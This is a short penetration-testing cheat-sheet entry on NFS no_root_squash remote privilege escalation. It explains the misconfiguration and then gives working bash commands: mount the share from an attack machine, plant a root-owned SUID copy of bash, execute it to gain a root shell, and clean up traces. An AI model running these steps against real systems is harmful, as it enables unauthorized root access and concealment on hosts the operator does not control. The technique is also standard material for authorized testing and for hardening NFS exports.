NFS

no_root_squash privilege escalation (remote)

By default, NFS shares convert root user requests into the non-privileged nfsnobody user, "squashing" root privileges. When no_root_squash is enabled, this protection is disabled, allowing any client mounting the directory to "read, write and modify files within the directory as root" on the host machine.

This represents a remote privilege escalation scenario where /etc/exports permits all (*) hosts to mount the NFS share.

Exploitation Steps

1. Verify no_root_squash configuration:

N/ABASH

cat /etc/exports
/share/nfs	*(rw,insecure,sync,no_subtree_check,no_root_squash)

2. Mount the NFS share from an attack machine:

N/ABASH

mkdir /tmp/pe
mount -t nfs victimHost:/share/nfs /tmp/pe
cd /tmp/pe

3. Modify permissions to allow low-privileged user access:

N/ABASH

chmod 777 /tmp/pe

4. Copy bash binary and set SUID bit:

N/ABASH

cp /bin/bash /tmp/pe
chmod +s bash
chown root:root bash

5. Execute with elevated privileges:

N/ABASH

./bash -p

This grants root access via the SUID bash binary.

6. Cleanup:

N/ABASH

rm bash
chmod 750 /tmp/pe
umount /tmp/pe

██╗ ██████╗ ███████╗██╗███████╗███╗ ██╗██████╗ ██║██╔═══██╗██╔════╝██║██╔════╝████╗ ██║██╔══██╗ ██║██║ ██║█████╗ ██║█████╗ ██╔██╗ ██║██║ ██║ ██║██║ ██║██╔══╝ ██║██╔══╝ ██║╚██╗██║██║ ██║ ██║╚██████╔╝██║ ██║███████╗██║ ╚████║██████╔╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═══╝╚═════╝